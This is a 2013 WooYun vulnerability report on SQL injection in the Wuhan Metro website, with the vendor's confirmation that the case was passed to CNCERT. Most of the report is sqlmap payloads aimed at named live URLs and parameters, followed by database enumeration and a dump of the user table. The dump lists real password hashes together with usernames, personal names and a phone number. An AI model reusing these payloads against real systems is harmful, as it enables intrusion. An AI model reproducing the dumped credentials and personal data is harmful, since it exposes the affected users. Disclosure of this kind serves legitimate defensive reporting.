当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023873

漏洞标题:武汉地铁网站SQL注入漏洞

相关厂商:武汉地铁网站

漏洞作者: lucky

提交时间:2013-05-17 14:30

修复时间:2013-07-01 14:31

公开时间:2013-07-01 14:31

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-17: 细节已通知厂商并且等待厂商处理中
2013-05-20: 厂商已经确认,细节仅向厂商公开
2013-05-30: 细节向核心白帽子及相关领域专家公开
2013-06-09: 细节向普通白帽子公开
2013-06-19: 细节向实习白帽子公开
2013-07-01: 细节向公众公开

简要描述:

详细说明:

http://www.whrt.gov.cn:8200/web/tms/JobList.aspx?t=1
Place: GET
Parameter: t
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: t=1' AND 9314=9314 AND 'arrX'='arrX
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: t=1'; WAITFOR DELAY '0:0:5';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: t=1' WAITFOR DELAY '0:0:5'--
---


http://www.whrt.gov.cn:8200/web/tms/Page.aspx?id=43
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=43' AND 8962=8962 AND 'dCxJ'='dCxJ
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: id=-3937' UNION ALL SELECT 73, CHAR(58)+CHAR(98)+CHAR(121)+CHAR(108)+CHAR(58)+CHAR(72)+CHAR(122)+CHAR(113)+CHAR(116)+CHAR(120)+CHAR(70)+CHAR(102)+CHAR(100)+CHAR(108)+CHAR(87)+CHAR(58)+CHAR(119)+CHAR(100)+CHAR(110)+CHAR(58), 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73, 73-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=43'; WAITFOR DELAY '0:0:5';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=43' WAITFOR DELAY '0:0:5'--
---


[02:02:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


available databases [5]:                                                       
[*] EUF
[*] master
[*] model
[*] msdb
[*] tempdb


关键数据库中的表

Database: EUF
[26 tables]
+------------------------------+
| dbo.EUF_SYS_ButtonPermission |
| dbo.EUF_SYS_Buttons          |
| dbo.EUF_SYS_Dictionary       |
| dbo.EUF_SYS_DictionaryType   |
| dbo.EUF_SYS_Menu             |
| dbo.EUF_SYS_Role             |
| dbo.EUF_SYS_RolePermission   |
| dbo.EUF_SYS_User             |
| dbo.EUF_SYS_UserRole         |
| dbo.PRE_Cate                 |
| dbo.PRE_DocVisitLog          |
| dbo.PRE_QueryLog             |
| dbo.aut_Job                  |
| dbo.aut_Question             |
| dbo.aut_Resume               |
| dbo.aut_p                    |
| dbo.aut_s                    |
| dbo.doc_files                |
| dbo.doc_table1               |
| dbo.doc_table2               |
| dbo.doc_table3               |
| dbo.doc_table4               |
| dbo.doc_table5               |
| dbo.doc_table6               |
| dbo.doc_table7               |
| dbo.index_task               |
+------------------------------+


Database: EUF
Table: dbo.EUF_SYS_User
[8 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| F_LoginUrl | varchar  |
| F_PassWord | varchar  |
| F_RealName | varchar  |
| F_RegDate  | datetime |
| F_RoleID   | varchar  |
| F_State    | varchar  |
| F_UserID   | int      |
| F_UserName | varchar  |
+------------+----------+


获取表中的信息:

[00:34:51] [INFO] fetching entries of column(s) 'F_PassWord, F_UserName' for table 'EUF_SYS_User' in database 'EUF'
[00:34:51] [INFO] fetching number of column(s) 'F_PassWord, F_UserName' entries for table 'EUF_SYS_User' in database 'EUF'
[00:34:51] [INFO] retrieved: 2247
[00:35:13] [INFO] fetching number of distinct values for column 'F_PassWord'
[00:35:13] [INFO] retrieved: 1579
[00:35:41] [INFO] fetching number of distinct values for column 'F_UserName'
[00:35:41] [INFO] retrieved: 2232
[00:36:01] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows
[00:36:01] [INFO] retrieved: 0038B8ACA49559591C0E0A7DECDA2109
[00:39:50] [INFO] retrieved: 白重阳
[00:42:00] [INFO] retrieved: 0082FB3BDE4D0352EA216A4557625265
[00:46:36] [INFO] retrieved: 雷能
[00:48:08] [INFO] retrieved: 0094AD3326E94F398A0CE2E5469ED1D1
[00:52:25] [INFO] retrieved: 15871409546
[00:54:00] [INFO] retrieved: 00CA1622835B03A23F920FFC187A0603
[00:58:09] [INFO] retrieved: [email protected]
[01:01:06] [INFO] retrieved: 00D149ED03C84DE7803DCFDED3AF7CDD
[01:05:29] [INFO] retrieved: kangta8358
[01:06:59] [INFO] retrieved: 00E56BC84DAE888D58CDC0DFBD4B91C0
[01:11:24] [INFO] retrieved: rush1985
[01:12:29] [INFO] retrieved: 01533FF41E5D4226096DD191D5BDA6D4
[01:16:36] [INFO] retrieved: EasyKevin
[01:17:49] [INFO] retrieved: 0199B38A911715A857232DB2D4D4EC59
[01:22:13] [INFO] retrieved: 张鑫
[01:23:51] [INFO] retrieved: 01B90361881AD76688E1D3F06408C33E
[01:28:31] [INFO] retrieved: [email protected]
[01:30:45] [INFO] retrieved: 020EB9F88D9DAF9128B208D894381BCD
[01:34:48] [INFO] retrieved: 吴腾标
[01:36:55] [INFO] retrieved: 021E98A5E9F8843F2C7D8E3547F9D1DC
[01:41:36] [INFO] retrieved: susan870106
[01:43:05] [INFO] retrieved: 023299564B0DB47D5F3E476A254D0C21
[01:47:57] [INFO] retrieved: xy1992
[01:49:10] [INFO] retrieved: 0280DEFE4139A5F6B654612093FDA20A
[01:53:48] [INFO] retrieved: weihulove
[01:55:34] [INFO] retrieved: 029F927284212196F3A59CEFFD7A204C
[01:59:53] [INFO] retrieved: yanfang429
[02:01:07] [INFO] retrieved: 02AA01E3ABECF5529448ADA16A873462
[02:05:19] [INFO] retrieved: xiexianwen






漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-05-20 23:05

厂商回复:

CNVD确认并复现所述情况,已在20日下午转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
按完全影响机密性进行评分(涉及多条用户数据),rank=7.79*1.0*1.4=10.906

最新状态:

暂无